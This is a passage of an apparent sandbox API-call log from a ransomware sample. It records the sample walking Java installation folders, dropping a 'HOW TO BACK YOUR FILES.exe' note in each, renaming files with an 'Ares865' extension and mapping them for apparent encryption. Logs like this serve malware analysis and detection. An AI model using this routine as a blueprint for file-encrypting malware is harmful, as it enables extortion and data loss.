lpString2="blacklist" | out: lpString1="blacklist") returned="blacklist" [0056.289] lstrlenW (lpString="blacklist") returned 9 [0056.289] lstrlenW (lpString="Ares865") returned 7 [0056.289] lstrcmpiW (lpString1="acklist", lpString2="Ares865") returned -1 [0056.289] lstrcpyW (in: lpString1=0x2e2e8bc, lpString2="cacerts" | out: lpString1="cacerts") returned="cacerts" [0056.289] lstrlenW (lpString="cacerts") returned 7 [0056.289] lstrlenW (lpString="Ares865") returned 7 [0056.289] lstrcpyW (in: lpString1=0x2e2e8bc, lpString2="java.policy" | out: lpString1="java.policy") returned="java.policy" [0056.289] lstrlenW (lpString="java.policy") returned 11 [0056.289] lstrlenW (lpString="Ares865") returned 7 [0056.289] lstrcmpiW (lpString1=".policy", lpString2="Ares865") returned -1 [0056.289] lstrcpyW (in: lpString1=0x2e2e8bc, lpString2="java.security" | out: lpString1="java.security") returned="java.security" [0056.289] lstrlenW (lpString="java.security") returned 13 [0056.289] lstrlenW (lpString="Ares865") returned 7 [0056.289] lstrcmpiW (lpString1="ecurity", lpString2="Ares865") returned 1 [0056.290] lstrcpyW (in: lpString1=0x2e2e8bc, lpString2="javafx.policy" | out: lpString1="javafx.policy") returned="javafx.policy" [0056.290] lstrlenW (lpString="javafx.policy") returned 13 [0056.290] lstrlenW (lpString="Ares865") returned 7 [0056.290] lstrcmpiW (lpString1=".policy", lpString2="Ares865") returned -1 [0056.290] lstrcpyW (in: lpString1=0x2e2e8bc, lpString2="javaws.policy" | out: lpString1="javaws.policy") returned="javaws.policy" [0056.290] lstrlenW (lpString="javaws.policy") returned 13 [0056.290] lstrlenW (lpString="Ares865") returned 7 [0056.290] lstrcmpiW (lpString1=".policy", lpString2="Ares865") returned -1 [0056.290] lstrcpyW (in: lpString1=0x2e2e8bc, lpString2="local_policy.jar" | out: lpString1="local_policy.jar") returned="local_policy.jar" [0056.290] lstrlenW (lpString="local_policy.jar") returned 16 [0056.290] lstrlenW (lpString="Ares865") returned 7 [0056.290] lstrcmpiW (lpString1="icy.jar", lpString2="Ares865") returned 1 [0056.290] lstrcpyW (in: lpString1=0x2e2e8bc, lpString2="trusted.libraries" | out: lpString1="trusted.libraries") returned="trusted.libraries" [0056.290] lstrlenW (lpString="trusted.libraries") returned 17 [0056.290] lstrlenW (lpString="Ares865") returned 7 [0056.290] lstrcmpiW (lpString1="braries", lpString2="Ares865") returned 1 [0056.290] lstrcpyW (in: lpString1=0x2e2e8bc, lpString2="US_export_policy.jar" | out: lpString1="US_export_policy.jar") returned="US_export_policy.jar" [0056.290] lstrlenW (lpString="US_export_policy.jar") returned 20 [0056.290] lstrlenW (lpString="Ares865") returned 7 [0056.290] lstrcmpiW (lpString1="icy.jar", lpString2="Ares865") returned 1 [0056.290] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\management", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\management" [0056.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0056.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0056.291] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\management") returned 47 [0056.291] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\management" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\management" [0056.291] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.291] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.297] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.297] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x530e1440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x530e1440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.297] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.297] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.297] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="jmxremote.access" | out: lpString1="jmxremote.access") returned="jmxremote.access" [0056.297] lstrlenW (lpString="jmxremote.access") returned 16 [0056.297] lstrlenW (lpString="Ares865") returned 7 [0056.297] lstrcmpiW (lpString1=".access", lpString2="Ares865") returned -1 [0056.298] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="jmxremote.password.template" | out: lpString1="jmxremote.password.template") returned="jmxremote.password.template" [0056.298] lstrlenW (lpString="jmxremote.password.template") returned 27 [0056.298] lstrlenW (lpString="Ares865") returned 7 [0056.298] lstrcmpiW (lpString1="emplate", lpString2="Ares865") returned 1 [0056.298] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template.Ares865") returned 83 [0056.298] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template.ares865"), dwFlags=0x1) returned 1 [0056.298] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0056.298] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2856) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0056.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0056.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0056.299] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0056.300] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0056.300] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.300] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe30, lpName=0x0) returned 0x15c [0056.301] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe30) returned 0x190000 [0056.302] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0056.303] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0056.303] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0056.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.304] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0056.304] CloseHandle (hObject=0x15c) returned 1 [0056.304] CloseHandle (hObject=0x154) returned 1 [0056.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0056.305] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744bcf20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744bcf20, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x3711, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="management.properties", cAlternateFileName="MANAGE~1.PRO")) returned 1 [0056.305] lstrcmpiW (lpString1="management.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.305] lstrcmpiW (lpString1="management.properties", lpString2="aoldtz.exe") returned 1 [0056.306] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="management.properties" | out: lpString1="management.properties") returned="management.properties" [0056.306] lstrlenW (lpString="management.properties") returned 21 [0056.306] lstrlenW (lpString="Ares865") returned 7 [0056.306] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.306] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="snmp.acl.template" | out: lpString1="snmp.acl.template") returned="snmp.acl.template" [0056.306] lstrlenW (lpString="snmp.acl.template") returned 17 [0056.306] lstrlenW (lpString="Ares865") returned 7 [0056.306] lstrcmpiW (lpString1="emplate", lpString2="Ares865") returned 1 [0056.306] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template.Ares865") returned 73 [0056.306] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template.ares865"), dwFlags=0x1) returned 1 [0056.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0056.307] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3376) returned 1 [0056.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0056.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0056.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0056.308] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0056.308] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0056.308] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.309] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1030, lpName=0x0) returned 0x15c [0056.310] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1030) returned 0x190000 [0056.311] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0056.311] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0056.311] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0056.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.312] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0056.312] CloseHandle (hObject=0x15c) returned 1 [0056.312] CloseHandle (hObject=0x154) returned 1 [0056.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0056.314] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744bcf20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744bcf20, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xd30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="snmp.acl.template", cAlternateFileName="SNMPAC~1.TEM")) returned 0 [0056.314] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0056.314] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7c70 [0056.314] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr" [0056.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dfa10 | out: hHeap=0x2b0000) returned 1 [0056.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0056.314] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr") returned 40 [0056.314] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr" [0056.314] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.314] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.320] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.320] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5312d700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.320] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.320] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.320] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="default.jfc" | out: lpString1="default.jfc") returned="default.jfc" [0056.320] lstrlenW (lpString="default.jfc") returned 11 [0056.320] lstrlenW (lpString="Ares865") returned 7 [0056.320] lstrcmpiW (lpString1="ult.jfc", lpString2="Ares865") returned 1 [0056.320] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="profile.jfc" | out: lpString1="profile.jfc") returned="profile.jfc" [0056.320] lstrlenW (lpString="profile.jfc") returned 11 [0056.320] lstrlenW (lpString="Ares865") returned 7 [0056.320] lstrcmpiW (lpString1="ile.jfc", lpString2="Ares865") returned 1 [0056.320] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\images" [0056.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df9b0 | out: hHeap=0x2b0000) returned 1 [0056.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0056.321] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\images") returned 43 [0056.321] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\images" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\images" [0056.321] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.321] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.325] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.325] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5312d700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.325] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.325] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.325] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="cursors" | out: lpString1="cursors") returned="cursors" [0056.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0056.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2d1ea0 [0056.325] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7c90 | out: ListHead=0x2e77d0, ListEntry=0x2e7c90) returned 0x2e7cd0 [0056.325] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5312d700, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0056.325] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0056.325] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5312d700, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0056.326] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0056.326] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7c90 [0056.326] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors" [0056.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0056.326] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors") returned 51 [0056.326] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors" [0056.326] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.326] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.332] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.332] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x53153860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53153860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.332] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.332] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.332] lstrcpyW (in: lpString1=0x2e2e8c8, lpString2="cursors.properties" | out: lpString1="cursors.properties") returned="cursors.properties" [0056.332] lstrlenW (lpString="cursors.properties") returned 18 [0056.332] lstrlenW (lpString="Ares865") returned 7 [0056.332] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.332] lstrcpyW (in: lpString1=0x2e2e8c8, lpString2="invalid32x32.gif" | out: lpString1="invalid32x32.gif") returned="invalid32x32.gif" [0056.332] lstrlenW (lpString="invalid32x32.gif") returned 16 [0056.332] lstrlenW (lpString="Ares865") returned 7 [0056.332] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0056.332] lstrcpyW (in: lpString1=0x2e2e8c8, lpString2="win32_CopyDrop32x32.gif" | out: lpString1="win32_CopyDrop32x32.gif") returned="win32_CopyDrop32x32.gif" [0056.332] lstrlenW (lpString="win32_CopyDrop32x32.gif") returned 23 [0056.332] lstrlenW (lpString="Ares865") returned 7 [0056.332] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0056.332] lstrcpyW (in: lpString1=0x2e2e8c8, lpString2="win32_CopyNoDrop32x32.gif" | out: lpString1="win32_CopyNoDrop32x32.gif") returned="win32_CopyNoDrop32x32.gif" [0056.332] lstrlenW (lpString="win32_CopyNoDrop32x32.gif") returned 25 [0056.332] lstrlenW (lpString="Ares865") returned 7 [0056.332] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0056.332] lstrcpyW (in: lpString1=0x2e2e8c8, lpString2="win32_LinkDrop32x32.gif" | out: lpString1="win32_LinkDrop32x32.gif") returned="win32_LinkDrop32x32.gif" [0056.333] lstrlenW (lpString="win32_LinkDrop32x32.gif") returned 23 [0056.333] lstrlenW (lpString="Ares865") returned 7 [0056.333] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0056.333] lstrcpyW (in: lpString1=0x2e2e8c8, 